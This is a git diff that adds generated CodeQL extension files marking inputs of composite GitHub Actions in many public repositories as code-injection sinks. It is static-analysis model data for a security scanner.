a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 00000000000..5af04ac6ac7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 00000000000..0d0cae87e09 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 00000000000..070b502e188 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 00000000000..6c0cf90523a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 00000000000..ca6459221d4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 00000000000..79d14b65bcc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 00000000000..69771693787 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 00000000000..a5a3cfbb1c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 00000000000..2000f5d9d00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 00000000000..95164c659ed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 00000000000..7e3b5e4caf6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 00000000000..f335170dc85 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 00000000000..555fa42a79c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 00000000000..8fd9440729f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 00000000000..f9479e11aab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 00000000000..711eabc2bfa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 00000000000..745f89d8677 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 00000000000..a732e2fac3f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 00000000000..1aebd1199a5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 00000000000..708adf528f2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 00000000000..18c02da4443 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 00000000000..c0a44fae749 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 00000000000..af0f474bfae --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 00000000000..731ecd5ab1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 00000000000..ca4dc84bbfc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 00000000000..caa6432efa9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 00000000000..a2e78841f69 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 00000000000..fbb76ae46e8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 00000000000..23d001db673 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 00000000000..94c7adf250a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 00000000000..85632a06a75 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 00000000000..9f002168214 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 00000000000..f1191e5c1c6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 00000000000..b0e30669c2e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 00000000000..e26f0a886d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 00000000000..4b40b2fda8a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 00000000000..06b6e37ea1c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 00000000000..dab53d9d5a3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 00000000000..ce485e688f2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 00000000000..82d69349e3a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 00000000000..13a6bfe9233 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 00000000000..163abb26185 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 00000000000..3be0de43329 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 00000000000..2b0b84e172b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 00000000000..bcd6e0eda31 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 00000000000..d93b946f3d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 00000000000..40adbe1fc29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 